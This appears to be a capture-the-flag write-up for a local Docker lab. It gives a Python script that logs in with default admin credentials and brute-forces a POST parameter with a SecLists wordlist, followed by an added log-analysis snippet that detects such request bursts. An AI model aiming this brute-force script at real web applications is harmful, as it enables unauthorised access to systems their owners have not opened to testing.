
Want to run this Docker container locally?

```
docker run -d -p 9016:5000 --restart always --name flag-i joshbeck2024/ctf-python-post-variables-flag-i
```

We’ll want to intercept this session using Burp Suite.
We are initially greeted by a login portal and are helpfully given the credentials admin/admin.

The idea:
- We want to write a program that uses `POST` instead of `GET`
- We need a parameter name of `new_flag`
- We need to try every word in `raft-small-words.txt` as a parameter value.

Download raft-small-words.txt:

```
wget https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Web-Content/raft-small-words.txt
```

Here is a script that will get the job done:
- This is an excellent script to save, as it logs in, preserves session state, and brute-forces a POST parameter. Good stuff here. (This code uses `session = requests.Session()`)

```python
import requests

# Configuration
URL = "http://localhost:9016"
WORDLIST = "raft-small-words.txt"
LOGIN_USER = "admin"
LOGIN_PASS = "admin"


def solve():
    # A Session keeps the login cookie, so later requests stay authenticated
    session = requests.Session()

    # 1. Login
    print(f"[*] Attempting to login to {URL}...")
    login_data = {
        "login_field": LOGIN_USER,
        "cred_field": LOGIN_PASS,
    }
    r = session.post(URL, data=login_data)
    # Heuristic check: a successful login ends up on /dashboard
    if "dashboard" in r.url or "authorized" in r.text.lower():
        print("[+] Login successful!")
    else:
        print("[-] Login failed. Check credentials or site status.")
        return

    # 2. Brute Force 'new_flag'
    print(f"[*] Starting brute force using {WORDLIST}...")
    try:
        with open(WORDLIST, "r") as f:
            # Skip blank lines so no empty values are sent
            words = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"[-] Error: {WORDLIST} not found.")
        return

    dashboard_url = f"{URL}/dashboard"
    for word in words:
        # print(f"Trying: {word}")
        r = session.post(dashboard_url, data={"new_flag": word})
        if "Flag-YouGotCred" in r.text:
            print("\n[!] SUCCESS! Flag found!")
            print(f"[!] Payload: {word}")
            print("[!] Flag: Flag-YouGotCred")
            return
    print("[-] Flag not found in wordlist.")


if __name__ == "__main__":
    solve()
```
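
Seen from the server side, a run like this is one client sending a long burst of POSTs to `/dashboard`. The following is an added example (not part of the original write-up) that flags such bursts in access-log lines; the log layout, the 10-second window, the threshold of 20 and the sample lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Assumed access-log layout (common log format); adjust the regex to your server.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3}'
)

def flag_post_bursts(lines, path="/dashboard", window_s=10, threshold=20):
    """Return {client_ip: peak number of POSTs to `path` inside any
    window_s-second window} for clients whose peak reaches `threshold`."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peak = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != path:
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # drop requests that fell out of the window
        peak[m["ip"]] = max(peak[m["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

def sample_log():
    """Constructed sample: one client looping over a wordlist, one normal user."""
    base = datetime.strptime("10/Oct/2024:13:55:00 +0000", TS_FMT)
    fmt = '{ip} - - [{ts}] "POST /dashboard HTTP/1.1" 200 1024'
    lines = []
    for i in range(60):  # 60 POSTs in 6 seconds from 203.0.113.7
        ts = (base + timedelta(seconds=i // 10)).strftime(TS_FMT)
        lines.append(fmt.format(ip="203.0.113.7", ts=ts))
    for i in range(3):   # 3 POSTs spread over a minute from 198.51.100.4
        ts = (base + timedelta(seconds=i * 30)).strftime(TS_FMT)
        lines.append(fmt.format(ip="198.51.100.4", ts=ts))
    return lines

if __name__ == "__main__":
    for ip, n in flag_post_bursts(sample_log()).items():
        print(f"{ip}: {n} POSTs to /dashboard within 10s")
```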
